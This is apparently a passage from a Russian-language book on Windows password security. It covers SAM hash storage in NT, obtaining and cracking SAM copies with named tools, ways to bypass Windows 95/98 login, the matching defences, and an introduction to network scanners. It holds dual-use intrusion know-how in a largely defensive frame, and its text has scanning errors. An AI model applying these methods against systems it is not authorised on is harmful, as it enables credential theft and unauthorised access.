Для совместимости с другим программным обеспечением корпорации Microsoft (Windows for Workgroups, Windows 95/98 и Lan Manager) в базе данных SAM хранится также информация о пароле пользователя в стандарте Lan Manager. Для ее формирования используется второй метод. Все буквенные символы исходной строки пользовательского пароля приводятся к верхнему регистру, и, если пароль содержит меньше 14 символов, то он дополняется нулями. Из каждой 7-байтовой половины преобразованного таким образом пароля пользователя отдельно формируется ключ для шифрования фиксированной 8-байтовой последовательности по DES-алгоритму. Полученные в результате две 8-байтовые половины хэшированного пароля Lan Manager еще раз шифруются по DES-алгоритму (при этом в качестве ключа используется RID пользователя) и помещаются в базу данных SAM.
Использование пароля
Информация о паролях, занесенная в базу данных SAM, служит для аутентификации пользователей Windows NT. При интерактивном или сетевом входе в систему введенный пользователем пароль сначала хэшируется и шифруется, а затем сравнивается с 16-байтовой последовательностью, записанной в базе данных SAM. Если они совпадают, пользователю разрешается вход в систему.
Обычно в базе данных SAM хранятся в зашифрованном виде оба хэшированных пароля. Однако в некоторых случаях операционная система вычисляет только один из них. Например, если пользователь домена Windows NT изменит свой пароль, работая на компьютере с Windows for Workgroups, то в его учетной записи останется только пароль Lan Manager. А если пользовательский пароль содержит более 14 символов или если эти символы не входят в так называемый набор поставщика оборудования (original equipment manufacturer, OEM), то в базу данных SAM будет занесен только пароль Windows NT.
Возможные атаки на базу данных SAM
Обычно основным предметом вожделения, испытываемого взломщиком парольной защиты операционной системы, являются административные полномочия. Их можно получить, узнав в хэшированием или символьном виде пароль администратора системы, который хранится в базе данных SAM. Поэтому именно на базу данных SAM бывает направлен главный удар взломщика парольной защиты Windows NT.
По умолчанию в операционной системе Windows NT доступ к файлу \winnt_root\System32\Config\SAM заблокирован для всех без исключения ее пользователей. Тем не менее, с помощью программы NTBACKUP любой обладатель права на резервное копирование файлов и каталогов Windows NT может перенести этот файл с жесткого диска на магнитную ленту. Резервную копию реестра также можно создать утилитой REG ВАК из Windows NT Resource Kit. Кроме того, несомненный интерес для любого взломщика представляют резервная копия файла SAM (SAM.SAV) в каталоге \winnt_root\System32\Config и сжатая архивная копия SAM (файл SAM._) в каталоге \winnt_root\Repair.
При наличии физической копии файла SAM извлечь хранимую в нем информацию не представляет никакого труда. Загрузив файл SAM в реестр любого другого компьютера с Windows NT (например, с помощью команды Load Hive программы REGEDT32), можно в деталях изучить учетные записи пользователей, чтобы определить значения RID пользователей и шифрованные варианты их хэшированных паролей. Зная RID пользователя и имея зашифрованную версию его хэшированного пароля, компьютерный взломщик может попытаться расшифровать этот пароль, чтобы использовать его, например, для получения сетевого доступа к другому компьютеру. Однако для интерактивного входа в систему одного лишь знания хэшированного пароля недостаточно. Необходимо получить его символьное представление.
Для восстановления пользовательских паролей операционной системы Windows NT в символьном виде существуют специальные парольные взломщики, которые выполняют как прямой подбор паролей, так и поиск по словарю, а также используют комбинированный метод взлома парольной зашиты, когда в качестве словаря задействуется файл с заранее вычисленными хэшированными паролями, соответствующими символьным последовательностям, которые часто применяются в качестве паролей пользователей операционных систем. Одной из самых известных программ взлома паролей операционной системы Windows NT является LOphtCrack (http://www.10pht.com/IOphtcrack/).
Другим распространенным парольным взломщиком Windows NT является Advanced NT Security Explorer (сокращенно — ANTExp). Его можно найти в Internet по адресу http://www.elcomsoft.com/antexp.html. ANTExp имеет удобный пользовательский интерфейс. Пользователь может задать набор символов, из которых будут формироваться последовательности, используемые в качестве вариантов паролей, а также верхнюю и нижнюю границу длины перебираемых паролей. Кроме того, можно выбрать тип атаки на парольную защиту Windows NT и применить либо атаку методом "грубой силы", либо словарную атаку.
Защита системы от парольных взломщиков
Итак, вывод однозначен: одна из главных задач системного администратора Windows NT состоит в защите от несанкционированного доступа той информации, которая хранится в базе данных SAM. С этой целью ему, прежде всего, необходимо ограничить физический доступ к компьютерам сети и прежде всего — к контроллерам доменов. Дополнительно, при наличии соответствующих программно-аппаратных средств, следует установить пароли BIOS на включение компьютеров и на изменение настроек BIOS. Затем, , используя настройки BIOS, рекомендуется отключить загрузку компьютеров с гибких и компакт-дисков. А для обеспечения контроля доступа к файлам и папкам операционной системы Windows NT системный раздел жесткою диска должен иметь формат NTFS.
Каталог \winnt_root\repair нужно средствами операционной системы закрыть для доступа всех пользователей, включая администраторов, и разрешать к ней доступ только во время работы утилиты RDISK, создающей в этом каталоге архивные копии системного реестра Windows NT. Системные администраторы также должны внимательно следить за тем, где и как хранятся дискеты аварийного восстановления (Emergency Repair Disks) и архивные копии на магнитных лентах, если на последних присутствует дубликат системного реестра Windows NT.
Если компьютер с операционной системой Windows NT входит в домен, то по умолчанию имена и хэшированные пароли последних 10-ти пользователей, регистрировавшихся на этом компьютере, сохраняются (кэшируются) в его локальном системном реестре (в разделе SECURITY\Policy\Secrets куста HKEY LOCAL_MACHINE). Чтобы отменить кэширование паролей на компьютерах домена, нужно с помощью утилиты REGEDT32 в раздел Micro-soft\WindowsNT\CurrentVersion\Winlogon куста HKEY_LOCAL MACHINE добавить параметр CashedLogonsCount, установив его значение равным нулю, а тип — REG_SZ.
Для защиты базы данных SAM можно применить утилиту SYSKEY, входящую в состав пакета обновления Windows NT Service Pack 3. Эта утилита позволяет включить режим дополнительного шифрования информации о паролях, которая хранится в базе данных SAM. Уникальный 128-битовый ключ для дополнительного шифрования паролей (так называемый ключ шифрования паролей — Password Encryption Key, РЕК) автоматически сохраняется в системном реестре для дальнейшего использования.
Перед помещением в системный реестр ключ РЕК шифруется при помощи Другого 128-битового ключа, который называется системным ключом (System Key), и может храниться либо в системном реестре, либо в файле с именем STARTUP.KEY в корневом каталоге на отдельной дискете. Можно не сохранять системный ключ на магнитном носителе, и тогда каждый раз при запуске операционной системы он будет вычисляться с помощью алгоритма MD5 на основе пароля, набираемого на клавиатуре в диалоговом окне утилиты SYSKEY. Последние два способа хранения системного ключа обеспечивают максимальную защиту паролей в базе данных SAM, однако приводят к невозможности автоматической перезагрузки операционной системы, поскольку для завершения процесса перезагрузки потребуется либо вставить дискету с системным ключом и подтвердить ее наличие в дисководе путем нажатия кнопки ОК в появившемся диалоговом окне, либо вручную ввести системный ключ с клавиатуры.
Для повышения стойкости паролей пользователей операционной системы Windows NT ко взлому рекомендуется с помощью утилиты Диспетчер пользователей (User Manager) задать минимальную длину пользовательских паролей равной не менее 8 символов и включить режим устаревания паролей, чтобы пользователи периодически их обновляли. При этом чем выше вероятность атак на парольную защиту Windows NT, тем короче должен быть срок такого устаревания. А чтобы пользователи не вводили свои старые пароли повторно, необходимо включить режим хранения некоторого числа ранее использовавшихся паролей.
Утилита PASSPROP из состава Windows NT Resource Kit, запущенная с ключом /COMPLEX, заставляет пользователей вводить более устойчивые пароли, которые или сочетают буквы в разном регистре, или буквы с цифрами, или буквы со специальными символами. Более строгие правила фильтрации нестойких паролей можно задать после установки любого из пакетов обновления Windows NT, начиная с Service Pack 2. Тогда специальная библиотека PASSFJLT.DLL, находящаяся в каталоге \winnt_root\System32, будет следить за тем, чтобы каждый пользовательский пароль состоял не менее чем из 5 символов, не содержал имени пользователя, включал символы, по крайней мере, трех наборов из четырех возможных, составленных из прописных букв, строчных букв, цифр и специальных символов (знаков препинания и т. д.) соответственно. Чтобы задать такой режим проверки паролей пользователей, необходимо в раздел HKEY_LOCAL_MACHINE\SYSTEM\CurrentControISet\Control\Lsa системного реестра с помощью программы REGEDT32 добавить параметр Noti fi cation Packages типа REG_MULTI_SZ и вписать в него строку PASSFILT Если этот параметр уже имеется, то новую строку следует дописать после уже существующей.
В заключение необходимо отметить, что хотя в умелых руках злоумышленника программы взлома паролей операционных систем представляют огромную опасность для их парольной защиты, сами парольные взломщики все же являются не менее ценным инструментом для системных администраторов, которые заинтересованы в выявлении слабых мест в парольной защите своих операционных систем. Основная проблема состоит не в том ч го на свете существуют парольные взломщики, а в том, что ими недостаточно часто пользуются системные администраторы. Надеюсь, что после выхода в свет этой книги положение дел изменится к лучшему.
В настоящее время Windows корпорации Microsoft является наиболее распространенной операционной системой. Подавляющее большинство компьютеров, которые повсеместно используются для решения самых разнообразных задач, функционируют именно под ее управлением.
Однако, признавая отменные потребительские качества операционных систем корпорации Microsoft, нельзя обойти вниманием имеющиеся в них значительные изъяны. В первую очередь, это касается парольной зашиты Windows 95 и Windows 98. Фактически парольная защита в Windows 98 осталась на прежнем уровне по сравнению с Windows 95. Поэтому все сказанное в ходе дальнейшего изложения в равной степени относится к ним обеим. А следовательно, рассматривая парольную защиту Windows 95 и Windows 98, можно вести речь не о двух отдельных операционных системах, а о единой, обобщенной операционной системе, которую будем условно называть Windows 95/98.
Далеко не все пользователи знают, что для парольной защиты Windows 95/98 характерны существенные недостатки, связанные с тем, что при ее разработке корпорация Microsoft не уделила должного внимания проблемам безопасности компьютеров, для которых предназначалась эта операционная система. Рассмотрим подробнее, что представляет собой парольная защита в Windows 95/98, какие у нее имеются изъяны и как от них избавиться средствами самой операционной системы.
Как установить парольную защиту Windows 95/98
Чтобы установить парольную защиту в Windows 95/98, необходимо выполнить следующую процедуру:
1. Дважды щелкните левой кнопкой мыши на пиктограмме Мой компьютер (My Computer).
2. Теперь дважды щелкните на пиктограмме Панель управления (Control Panel). Если вы не можете отыскать пиктограмму Мой компьютер (My Computer), щелкните на кнопке Пуск (Start), выберите раздел Настройка (Settings), затем Панель управления (Control Panel) и перейдите к пункту 3.
3. Найдите пиктограмму, которая называется Пароли (Passwords), и дважды щелкните на ней. После двойного щелчка на пиктограмме Пароли (Passwords) Windows может отобразить диалоговое окно, в котором ним будет задан вопрос о том, хотите ли вы одновременно с этим изменить пароль экранной заставки Windows 95/98. Это окно появится только в том случае, если вы уже используете опцию экранной заставки. Суть вопроса в том, чтобы предоставить вам возможность использовать одинаковый пароль и для открытия сеанса работы с Windows 95/98, и для экранной заставки.
4. Щелкните на опции Сменить пароль Windows (Change Windows Passwords).
5. Введите новый пароль в поле Новый пароль (New Password) диалогового окна Изменение пароля Windows (Change Windows Passwords) (рис. 3.1). He обращайте внимания на поле Старый пароль (Old Password), оно должно остаться незаполненным. Однако если вы хотите изменить существующий пароль, то сначала введите его, а затем новый пароль. Операционная система Windows 95/98 внесет соответствующие изменения.
6. В поле Подтверждение пароля (Confirm New Password) введите пароль, указанный вами в пункте 5. Затем щелкните на кнопке ОК. Windows 95/98 выведет сообщение о том, что смена пароля прошла успешно.
Рис. 3.1. Диалоговое окно Изменение пароля Windows
7. Щелкните на кнопке ОК для закрытия диалогового окна Свойства: Пароли (Passwords Properties).
Почему парольная защита Windows 95/98 ненадежна
После того как была установлена парольная защита, каждый раз, когда включается компьютер, Windows 95/98 станет вежливо осведомляться о том, каковы ваши регистрационное имя и пароль. Продолжение нормальной работы с Windows 95/98 будет возможно только в том случае, если регистрационное имя и соответствующий ему пароль были введены без ошибок. Означает ли это, что система парольной защиты Windows 95/98 гарантирует: злоумышленник не сможет знакомиться с содержимым всех ваших файлов и запускать любые программы на вашем компьютере?
Отнюдь. Почему? Да по той простой причине, что в основе функционирования Windows 95/98 лежат принципы, которые были применены на практике при создании другой, более примитивной операционной системы корпорации Microsoft — DOS. Несмотря на то, что Windows 95/98 старается "упрятать" DOS как можно дальше, она по-прежнему использует эту безнадежно устаревшую операционную систему для обеспечения работоспособности старых программ, которые остались у пользователей, сменивших DOS на Windows 95/98. А ведь хорошо известно, что в DOS напрочь отсутствуют защитные механизмы, которые предотвращают несанкционированный доступ к файлам и программам компьютера, работающего под ее управлением. Ведь в сущности DOS и задумывалась-то именно для выполнения совершенно противоположной задачи — предоставить всем возможность обращаться к любым файлам. Как следствие, существует несколько способов обойти парольную защиту Windows 95/98, загружая на компьютере операционную систему DOS вместо Windows 95/98.
Как предотвратить несанкционированную загрузку системы
В ходе инсталляции операционной системы Windows 95/98 корпорация Microsoft настойчиво рекомендует ее пользователям сразу же создать так называемый загрузочный диск. В этой рекомендации есть свой резон: если возникнут какие-либо проблемы при переходе на Windows 95/98, вы сможете воспользоваться загрузочным диском, чтобы внести необходимые поправки.
Если вы не создали загрузочную дискету во время инсталляции операционной системы, вы можете сделать это в любой момент. Выберите опцию Установка и удаление программ (Add/Remove Programs) на Панели управления (Control Panel) Windows 95/98, а затем щелкните на переключателе Загрузочный диск (Startup Disk). После этого нажмите кнопку Создать диск (Create Disk) и вставьте гибкий диск в дисковод. Чтобы создать загрузочный диск Ж Windows 95/98, вам потребуется всего одна дискета.
Таким образом, для создания загрузочного диска не требуется каких-либо особенных познаний. Зато с его помощью можно без всяких хлопот обойти систему парольной защиты Windows 95/98. Эта система активируется только при загрузке Windows 95/98. При использовании же загрузочного диска происходит запуск не Windows 95/98, а ее подсистемы, функционально эквивалентной операционной системе DOS и не имеющей никаких средств обеспечения безопасной работы с компьютером (наподобие парольной защиты). Затем путем нехитрых манипуляций злоумышленник может не только установить собственный пароль для последующего открытия сеанса работы с Windows 95/98, но и сделать так, чтобы все остальные ее пользователи ничего не заметили и продолжали регистрироваться в Windows 95/98 посредством своих законных паролей.
Чтобы предотвратить несанкционированный доступ к компьютеру через загрузочный диск, необходимо применять дополнительные физические меры защиты (например, закрывать на замок дверь, ведущую в помещение, где находится компьютер), блокировать клавиатуру или кнопку включения питания компьютера при помощи ключа, использовать установки BIOS компьютера для предотвращения неконтролируемой загрузки операционной системы с гибкого диска, а также для задания пароля включения питания и изменения установок BIOS.
Подобные меры окажутся весьма действенными и в том случае, если злоумышленник захочет использовать возможность загрузки Windows 95/98 в режиме защиты от сбоев, который также называется защищенным режимом (Safe Mode). Этот режим представляет собой специальный способ работы с Windows 95/98, с помощью которого можно запустить эту операционную систему, невзирая на всякие "мелочи" вроде парольной защиты. Для этого после включения питания компьютера достаточно удерживать в нажатом положении клавишу <F5> компьютерной клавиатуры.
Помимо <F5>, на клавиатуре имеются две другие особо "опасные" клавиши — <Ctrl> и <F8>, нажимая которые в ходе первоначальной загрузки Windows 95/98, злоумышленник может вызвать на экран дисплея специальное меню. В нем в качестве одной из опций присутствует возможность вместо Windows 95/98 запустить операционную систему DOS. С помощью этого меню можно заставить Windows 95/98 грузиться в режиме защиты от сбоев. Присутствие обеих этих возможностей одинаково нежелательно с точки зрения обеспечения в Windows 95/98 надежной парольной защиты.
Поэтому использование <F5>, <F8> и <Ctrl> и других подобных им клавиш в ходе первоначальной загрузки следует запретить, заставив Windows 95/98 никак не реагировать на их нажатие. Для этого достаточно отредактировать системный файл MSDOS.SYS, располагающийся, как правило, в разделе жесткого диска, с которого грузится Windows 95/98. Открыв MSDOS.SYS при помощи обычного редактора, вы увидите текст примерно следующего содержания:
[Paths]
WinDir=C:\WINDOWS
WinBootDir=C:\WINDOWS
HostWinBootDrv=C
[Options]
BootGUI=l
;
;The following lines are required for compatibility with other programs.
;Do not remove them (MSDOS.SYS needs to be >1024 bytes).
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxa ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxb
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx c
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxd ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx x e ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxf ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxg ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxh ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxi
; ххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххх j ; ххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххх k
; ххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххх m
; ххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххх o
; хххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххр xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxq
; ххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххх r
; ххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххх s
Добавьте в раздел [Options] файла MSDOS.SYS одну из двух команд: BootKeys = 0 или BootDeiay= 0 . Обе эти команды позволяют дезактивировать работу клавиш <F5>, <F8> и <Ctrl> в ходе первоначальной загрузки. А чтобы слишком умный взломщик не смог незаметно убрать команду BootKeys = 0 или BootDeiay= 0 , предусмотрительно помещенную вами в файл MSDOS.SYS, следует защитить его при помощи антивирусного сканера, который своевременно предупредит вас обо всех попытках внести несанкционированные изменения в этот файл.
Как запретить кэширование паролей в Windows 95/98
Пользователи миллионов компьютеров, применяющих парольную защиту Windows 95/98, часто даже не подозревают о еще одной грозящей им опасности. Проблема связана с кэшированием паролей — методом, который был разработан корпорацией Microsoft для их хранения в Windows 95/98. Многие выбирают кэширование паролей, даже не догадываясь об этом, поскольку кэширование в Windows 95/98 разрешено по умолчанию. В этом случае пользовательский пароль помещается операционной системой в отдельный файл на магнитном диске. Например, если ваше имя — Вадим, и оно также является идентификатором для входа в систему, то ваш пароль будет сохранен в файле C:\WINDOWS\BAAHM.PWL.
При кэшировании пароль записывается в PWL-файл в зашифрованном виде. В корпорации Microsoft утверждают, что применяемый метод шифроваия является лучшим среди разрешенных правительством США для экспорта за пределы страны. Суть возражений оппонентов Microsoft состоит в том. if что реализация этого метода в Windows 95/98 далеко не безупречна, и в результате его стойкость совершенно не отвечает современным требованиям. А Программы, предназначенные для дешифрования парольных файлов, можно легко отыскать в глобальной сети Internet (например, по адресу http://www.c2.org/hacksoft/), что свидетельствует об уязвимости метола шифрования паролей в Windows 95/98.
Существует 2 пути решения этой проблемы. Во-первых, можно получить от Microsoft "заплату", которая позволяет использовать в Windows 95/98 более совершенный метод шифрования паролей. Такая "заплата" доступна пользователям глобальных компьютерных сетей, в которых присутствует корпорация Microsoft.
Во-вторых, кэширование паролей можно отключить. Правда, чтобы сделать это, придется немного повозиться. Для начала потребуется установить программу, которая называется Редактор системных правил (System Policy Editor). Эта программа входит в комплект Windows 95/98 Resource Kit (Набор ресурсов Windows 95/98), который включен в поставку Windows 95/98 на компакт-диске. Чтобы ее установить, надо выполнить следующее:
1. Используя пиктограмму Установка и удаление программ (Add/Remove Programs) в Панели управления (Control Panel), выберите вкладку Установка Windows (Windows Settings).
2. Нажмите на кнопку Установить с диска (Have Disk) и в появившемся диалоговом окне укажите каталог E:\ADMIN\APPTOOLS\POLED1T для Windows 95 или E:\TOOLS\RESKIT\NETADMIN\POLEDIT для Windows 98 (если ваш CD-ROM установлен как диск Е).
3. В диалоговом окне, появившемся после нажатия кнопки Установить с диска (Have Disk), выберите программу Редактор системных правил (System Policy Editor), а затем нажмите кнопку Установить (Install).
4. Нажмите кнопку ОК, чтобы закрыть диалоговое окно Установка и удаление программ (Add/Remove Programs).
После установки для запуска редактора системных правил следует сначала выбрать пункт Программы (Programs) меню Пуск (Start), затем Стандартные (Accessories), далее Служебные (System Tools) и наконец — Редактор системных правил (System Policy Editor). Немного погодя перед вами появится диалоговое окно этой программы.
Выполнив команду Создать (New File) меню Файл (File), вы увидите пиктограммы Стандартный компьютер (Default Computer) и Стандартный пользователь (Default User). Щелкнув дважды сначала на пиктограмме Стандартный компьютер (Default Computer), а затем — на кнопках Сеть (Network) и Пароли (Passwords), можно пометить галочкой строку Отключить кэширование паролей (Disable Password Cashing).
Затем внесенные изменения следует сохранить на диске в виде файла системных правил с расширением POL, назвав его по своему усмотрению. При следующем запуске Windows 95/98 файл системных правил загрузится автоматически и будет определять работу компьютера.
Соблюдайте осторожность: парольная защита ненадежна
Попробуйте набрать произвольную последовательность символов, когда Windows 95/98 предложит вам ввести свое регистрационное имя и соответствующий пароль. Вы думаете, эта операционная система гневно ответит вам: "Руки прочь от компьютера! Введенное вами имя нельзя использовать, т. к. оно не зарегистрировано"? Ничего подобного! Вместо этого она ласково скажет: "Да вы, батенька, никогда раньше этим именем не пользовались. А не желаете ли зарегистрироваться?"
Злоумышленник, конечно же, с радостью согласится, и Windows 95/98 будет в его полном распоряжении. Примерно то же самое получится, если в ответ на приглашение зарегистрироваться нажать на клавиатуре компьютера клавишу <ESC>.
Эти простые приемы должны убедить вас в полной бесполезности парольной защиты Windows 95/98 в деле обеспечения безопасной работы с компьютером. Если вас такое положение дел не устраивает, загрузите улучшенный вариант библиотеки программ, реализующий парольную защиту в Windows 95/98, с Internet-сервера корпорации Microsoft по адресу http://www.microsoft.com/windows/download/mspwlupd.exe. После запуска программы mspwlupd.exe надо будет ответить Да (Yes) на вопрос о том, желаете ли вы заменить библиотеку, реализующую работу с паролями в Windows 95/98. Соответствующее программное обеспечение установится автоматически и будет работать после перезагрузки операционной системы.
Далее, с использованием редактора системных правил, можно определить полномочия всех пользователей (т. е., что им позволено делать, а что нет). В результате каждый пользователь Windows 95/98 будет иметь свой собственный набор полномочий. При этом настоятельно рекомендуется строго ограничить права пользователей, не имеющих пароля.
Уместен вопрос: а зачем вообще в Windows 95/98 нужна такая ничтожная парольная защита? Тем, кто уже приготовился произнести гневную тираду в адрес корпорации Microsoft, лучше приберечь свой пыл для более подходящего случая, поскольку ею официально заявлено, что основное назначение паролей Windows 95/98 состоит в предоставляемой ими возможности по-разному настраивать один и тот же компьютер для различных пользователей. А посему тем, кому нужна полноценная парольная защита, следует посоветовать обратиться к другой операционной системе семейства Windows (Windows NT) или воспользоваться дополнительными программными средствами, специально предназначенными для безопасной работы с Windows 95/98 (например, пакетом программ Norton Your Eyes Only компании Symatec). Что же касается новейшей операционной системы Windows 2000, то хотя и дополнение ко всему лучшему, что имелось в предыдущих версиях операционных систем семейства Windows, в ней должно было быть реализовано множество совершенно новых возможностей и технологий, способных повысить эффективность работы практически любого пользователя, делать какие-либо определенные выводы относительно подсистемы безопасности Windows 2000 пока еще преждевременно.
Конечно, чисто теоретически использование протокола Kerberos позволяет существенно улучшить механизм аутентификации в Windows 2000 даже по сравнению с Windows NT, не говоря уже о Windows 95/98. Однако вопрос о том, насколько хорошей будет практическая реализация этого протокола, остается открытым вплоть до официального выхода в свет финальной версии Windows 2000. Дело в том, что бета-версии операционных систем, как правило, не обладают функциональной полнотой их финальных версий, а также часто содержат ошибки, большинство которых исправляется к моменту выпуска финальных версий. Поэтому бета-версии программных продуктов могут служить лишь подсобным материалом для сугубо предварительного тестирования. "Сенсационная" информация в прессе о том, что пользователи могут регистрироваться в третьей по счету бета-версии Windows 2000 без ввода пароля, отнюдь не означает, что то же самое можно будет проделывать в ее финальной версии, которая, как планируется, должна поступить в продажу 17 февраля 2000 г. И целенаправленный поиск дыр в подсистеме безопасности операционной системы Windows 2000 лучше всею отложить до момента выхода ее финальной версии.
Глава 4. Безопасность компьютерной сети
Сканеры
Когда-то давным-давно жесткие диски персональных компьютеров были объемом всего-навсего 10 Мбайт, а их оперативная память не превышала 640 Кбайт. Модемы работали на скоростях от 300 до 1200 бит/с, и мало кто из пользователей "персоналок" слышал о глобальной компьютерной сети Internet. Конечно, эта сеть существовала уже тогда, но использовалась исключительно в военных целях, а работа с ней осуществлялась только при помощи командной строки. Но не это служило основным препятствием для массового доступа к сети Internet. Вычислительные машины, которые могли быть задействованы в качестве серверов, были очень дорогими — их стоимость исчислялась цифрами с пятью-шестью нулями (в долларах). Да и сами персональные компьютеры стоили тогда весьма недешево, и были по карману только обеспеченным людям.
Итак, представим себе пригородный район, в котором проживают люди с достатком. Солидные дома с просторными гаражами и аккуратно подстриженными газонами. Близится полночь. На улицах пустынно, в окнах темно. И только одно окно ярко светится в темноте. Там, за персональным компьютером сидит юноша лет 15—17 и обзванивает при помощи модема телефонные номера, которые ему сообщил приятель. В большинстве случаев на другом конце провода оказывается другой модем, и на экране персонального компьютера появляется приглашение зарегистрироваться, т. е. ввести имя и пароль. Каждый раз, получив такое регистрационное приглашение. юноша начинает лихорадочно перебирать различные пары имен и соответствующих им паролей. Наконец, одна пара подходит, и юный взломщик получает возможность управлять удаленным компьютером, сидя дома.
Сейчас уже трудно поверить, что первым компьютерным взломщикам приходилось так напрягаться. Ведь известно, что они очень не любят выполнять рутинную работу и при всяком удобном случае стараются заставить свои компьютеры заниматься такой работой. Поэтому неудивительно, что компьютерные взломщики вскоре создали специальное программное средство, чтобы не набирать вручную дюжину команд. Это программное средство назвали боевым номеронабирателем.
Боевой номеронабиратель представляет собой программу, обзванивающею заданные пользователем телефонные номера в поисках компьютеров, которые в ответ на поступивший звонок выдают регистрационное приглашение Программа аккуратно сохраняет в файле на жестком диске все такие телефонные номера вместе с данными о скорости соединения с ними. Одним и ; самых известных и совершенных боевых номеронабирателей является TONELOC, предназначенный для работы в среде операционной системы DOS (он может быть запущен под управлением Windows 95/98 в режиме командной строки).
Дальнейшее совершенствование боевых номеронабирателей привело к созданию сканеров. Первые сканеры были весьма примитивными и отличались от боевых номеронабирателей только тем, что специализировались исключительно на выявлении компьютеров, подключенных к сети Internet пли к другим сетям, использующим протокол TCP/IP. Они были написаны на языке сценариев программной оболочки операционной системы UNIX. Такие сканеры пытались подсоединиться к удаленной хост-машине через различные порты TCP/IP, отправляя всю информацию, которая выводилась на устройство стандартного вывода этой хост-машины, на экран монитора того компьютера, где был запущен сканер.
Ныне сканеры стали весьма грозным оружием как нападения, так и защиты в Internet. Что же представляет собой современный сканер?
Сканер в вопросах и ответах
Что такое сканер?
Сканер — это программа, предназначенная для автоматизации процесса поиска слабостей в защите компьютеров, подключенных к сети в соответствии с протоколом TCP/IP. Наиболее совершенные сканеры обращаются к портам TCP/IP удаленного компьютера и в деталях протоколируют отклик, который они получают от этого компьютера. Запустив сканер на своем компьютере, пользователь, скажем, из подмосковной Малаховки, лаже не выходя из дома, может найти бреши в защитных механизмах сервера, расположенного, например, в Лос-Анджелесе.
Каковы системные требования для работы со сканерами?
Большинство сканеров предназначено для работы в среде операционном системы UNIX, хотя к настоящему времени такие программы имеются практически для любой операционной системы. Возможность запустить сканер на конкретном компьютере зависит от операционной системы, под управлением которой работает этот компьютер, и от параметров подключения к Internet. Есть сканеры, которые функционируют только в среде UNIX, а с остальными операционными системами оказываются несовместимыми. Другие отказываются нормально работать на устаревших компьютерах с Windows 3.11 и с медленным (до 14 400 бит/с) доступом к Internet, осуществляемым по коммутируемым линиям. Такие компьютеры будут надоедать сообщениями о переполнении стека, нарушении прав доступа или станут просто зависать.
Критичным является и объем оперативной памяти компьютера. Сканеры. которые управляются при помощи командной строки, как правило, более умеренны в своих требованиях, предъявляемых к объему оперативной памяти. А самыми "прожорливыми" являются сканеры, снабженные оконным графическим интерфейсом пользователя.
Трудно ли создать сканер?
Написать сканер не очень трудно. Для этого достаточно хорошо знать протоколы TCP/IP, уметь программировать на С или Perl и на языке сценариев, а также разбираться в программном обеспечении сокетов. Но и в этом случае не следует ожидать, что созданный вами сканер принесет большую прибыль, поскольку в настоящее время предложение на рынке сканеров значительно превышает спрос на них. Поэтому наибольшая отдача от усилий, вложенных в написание сканера, будет скорее моральной (от осознания хорошо выполненной работы), чем материальной.
Что не по силам даже самому совершенному сканеру?
Не следует переоценивать положительные результаты, которых можно достичь благодаря использованию сканера. Действительно, сканер может помочь выявить дыры в защите хост-машины, однако в большинстве случаев информацию о наличии этих дыр сканер выдает в довольно завуалированном виде, и ее надо еще уметь правильно интерпретировать. Сканеры редко снабжаются достаточно полными руководствами пользователя. Кроме того. сканеры не в состоянии сгенерировать пошаговый сценарий взлома исследуемой компьютерной системы. Поэтому для эффективного использования сканеров на практике прежде всего необходимо научиться правильно интерпретировать собранные с их помощью данные, а это возможно только при наличии глубоких знаний в области сетевой безопасности и богатого опыта.
Насколько легальны сканеры?
Обычно сканеры создаются и используются специалистами в области сетевой безопасности. Как правило, они распространяются через сеть Internet. чтобы с их помощью системные администраторы могли проверять компьютерные сети на предмет наличия в них изъянов. Поэтому обладание сканерами, равно как и их использование на практике, вполне законно. Однако рядовые пользователи, не являющиеся системными администраторами. должны быть готовы к тому, что, если они будут применять сканеры для обследования чужих сетей, то могут встретить яростное сопротивление со стороны администраторов этих сетей. Более того, некоторые сканеры в процессе поиска брешей в защите компьютерных сетей предпринимают такие действия, которые по закону могут квалифицироваться как несанкционированный доступ к компьютерной информации, или как создание, использование и распространение вредоносных программ, или как нарушение правил эксплуатации компьютеров, компьютерных систем и сетей. И если следствием этих деяний стало уничтожение, блокирование, модификация или копирование информации, хранящейся в электронном виде, то виновные в них лица в соответствии с российским законодательством подлежат уголовному преследованию. А значит, прежде чем начать пользоваться первым попавшимся под руку бесплатным сканером для UNIX-платформ, стоит убедиться, а не копирует ли случайно этот сканер заодно и какие-нибудь файлы с диска тестируемой им хост-машины (например, файл password из каталога /ETC).
В чем различие между сканерами и сетевыми утилитами?
Часто к сканерам ошибочно относят утилиты типа host, rusers, finger. Traceroute, Showmount. Связано это с тем, что, как и сканеры, данные утилиты позволяют собирать полезную статистическую информацию о сетевых службах на удаленном компьютере. Эту информацию можно затем проанализировать на предмет выявления ошибок в их конфигурации.
